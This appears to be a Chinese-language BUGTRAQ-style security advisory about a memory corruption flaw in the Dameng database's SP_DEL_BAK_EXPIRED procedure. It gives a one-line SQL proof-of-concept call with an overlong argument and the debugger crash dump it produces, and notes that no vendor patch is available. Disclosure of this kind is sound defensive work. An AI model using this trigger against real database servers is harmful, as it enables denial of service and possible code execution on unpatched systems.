达梦数据库SP_DEL_BAK_EXPIRED过程内存破坏漏洞

影响版本:
达梦数据库有限公司 达梦数据库

漏洞描述:
BUGTRAQ

达梦数据库是完全国产的数据库系统。

达梦数据库的SP_DEL_BAK_EXPIRED调用过程存在内存破坏漏洞，通过认证的用户可以以超长参数调用该过程导致拒绝服务或执行任意代码。

<*参考
Shennan Wang （wsn1983@gmail.com）
*>

测试方法:
CALL SP_DEL_BAK_EXPIRED('AAAAAAAAAAAAAAAAAAAA', '');

(458.5fc): Access violation - code c0000005 (!!! second chance !!!)

eax=00000000 ebx=02d3d430 ecx=ffffffff edx=074ecfd0 esi=074ed37c edi=0000041c

eip=100d1753 esp=074eccec ebp=074ed1fc iopl=0 nv up ei pl zr na pe nc

cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246

*** WARNING: Unable to verify checksum for C:dmdbmsbinwdm_dll.dll

*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:dmdbmsbinwdm_dll.dll -

wdm_dll+0xd1753:

100d1753 f2ae repne scas byte ptr es:[edi]

0:009> da ebp

074ed1fc "AAAAAAAAAAAAAAAAAAAA"

安全建议:
厂商补丁：

达梦数据库有限公司
------------------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.dameng.com/dmweb/welcome.do